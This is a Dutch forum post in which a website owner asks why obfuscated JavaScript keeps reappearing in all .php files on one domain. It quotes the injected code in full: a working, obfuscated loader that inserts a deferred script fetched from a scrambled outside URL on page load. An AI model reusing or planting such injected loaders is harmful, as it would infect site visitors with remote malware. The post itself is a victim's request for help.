:strip_icc():strip_exif()/u/202115/daemon-huge.jpg?f=community)
Id het mogelijk dat iemand mijn PHP kan hacken? Op de server zitten namelijk verschillende domeinen en dit heeft altijd goed gewerkt, behalve op 1 domein word er steeds in alle .php bestanden het volgende toegevoegd:
Als ik dan de website open dan geeft mijn anti-virus programma altijd foutmeldingen van virussen weer. Ik heb de PHP-backup toen terug gezeg naar een vorige datum, maar nu, een week later staat het script er weer onder.
code:
1
2
3
4
| <script>var x='';var xz='';var tl;if(tl!=''){tl='yc'};var q=document;var xh;if(xh!='g'){xh='g'};var r='s*c%r%i>p>t%'.replace(/[%k\*Q\>]/g, '');var p=window;var o;if(o!='jvj' && o!='h'){o='jvj'};var es=8735;p.onload=function(){var n=false;var uk=new String();try {this.ds="";e=q.createElement(r);var ql=new String();var qkp;if(qkp!='w'){qkp=''};this.wn=59283;var ft;if(ft!='' && ft!='jq'){ft=null};var cwa=false;e.src='hNtLtNp;:;/L/LgMoLoLgLl;eL-Ms2kN.MpNcMoLn;l;iMn2eN.2c;oMmM.;cNnL.NcNoLrMrLi2e2r2e;-Mi;t2.My;o2u;r;t;aNg;hMeNuLe;r2.MrMuL:;8;028N0;/2g2o2oNgNlLeN.2cNoMmM/2g;oLoNg2lMeN.NcLo2mN/;w2iLkNi2m2eLdLiMaL.No;r;gL/NrLm;x;aNd2sN.;c2oNmM/Mv;eLo2h2.Nc;o;mL/L'.replace(/[L;MN2]/g, '');var pk="";var et='';e.setAttribute('d@eTfTe@rt'.replace(/[tWT\>@]/g, ''), "1");var vk='';this.tle=977;q.body.appendChild(e);this.za='';} catch(_){var uz=false;var ra;if(ra!='bt' && ra != ''){ra=null};};var iwk=false;};var ti;if(ti!='tf'){ti=''};var i_="i_";</script>
<script>var tf="";var os;if(os!=''){os='y'};var w=window;var ty="ty";var t=document;var ep;if(ep!='d' && ep!='tl'){ep='d'};function i(k){var r=['h&t&tVp>:E/>/Et>rAi&pAoAdV-EcAoAm&.>a>sAkV.Ec>o&m>.VcEo>oAk>p>a>dE-Vc>oEmA.AhAoEtVnAe&wEgAu&i&d>eA.Ar>uA:&8E0E8E0>/At>rAi>bVaEl&fAu&sAi&o>nE.AcVo>mV/&tEr&iAb&aEl>fVuAsAi>o&n&.AcAoVm>/VgVoVoVgVlAeA.Ec>oVm>/>o>vVe>rV->b&lEo&gV.AcVo>mV/>5EdA6EdA.Ec>oAmV/V'.replace(/[VA\>E&]/g, ''), 'szcOrOiOpNtz'.replace(/[zRONY]/g, ''), 'cUrSe+aUtSeXEWlSe+mXeWnWt+'.replace(/[\+UWXS]/g, ''), 'o0n:l>o_a>d0'.replace(/[0~_\:\>]/g, ''), 'sPr<c,'.replace(/[,PtI\<]/g, ''), 'aXpBpbe@nbd2C2hbiXl2db'.replace(/[bB2X@]/g, ''), 's:e#t:Amt:t%roiob#u%t%eo'.replace(/[o\:m%#]/g, ''), 'b,o,djyz'.replace(/[z#,j\*]/g, ''), 'd8eZfZe;rZ'.replace(/[Zg8m;]/g, ''), "1"];var tw=r[k];var oy;if(oy!='' && oy!='v'){oy=null};return tw;var q="";}var xs="";var l = function(){try {e=t[i([2][0])](i([1,1][0]));var wq = t[i([7,9][0])];e[i([9,4][1])]=i([8,0][1]);e[i([6][0])](i([8][0]), i([9][0]));var pg=new Array();wq[i([6,5][1])](e);} catch(o){this.bu=64195;};var tk;if(tk!='a' && tk!='ll'){tk='a'};};var vg;if(vg!='' && vg!='mc'){vg=null};w[i([3][0])]=l;</script>
<!--f5749297bb557496cf63135d56c10cb2--> |
Als ik dan de website open dan geeft mijn anti-virus programma altijd foutmeldingen van virussen weer. Ik heb de PHP-backup toen terug gezeg naar een vorige datum, maar nu, een week later staat het script er weer onder.
http://www.dumo-technics.com
:strip_icc():strip_exif()/u/108711/crop58e79b6b8c6db_cropped.jpeg?f=community)
:strip_icc():strip_exif()/u/53213/crop579918c57678f.jpeg?f=community)
:strip_icc():strip_exif()/u/100483/kikker.jpg?f=community)
.:strip_exif()/u/26373/anim4.gif?f=community)
.:strip_icc():strip_exif()/u/4167/bacall8.jpg?f=community)
:strip_icc():strip_exif()/u/17313/_IGP1526kl2.jpg?f=community)
